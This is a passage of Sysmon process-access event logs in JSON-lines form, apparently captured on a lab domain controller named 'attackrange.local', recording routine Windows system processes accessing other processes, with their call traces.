06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.634\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010ED600A00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.634","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010ED600A00}","TargetProcessId":"5008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.681\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010D6620A00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.681","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010D6620A00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.681\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010D6620A00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.681","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010D6620A00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.681\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-0010D6620A00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.681","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-0010D6620A00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53d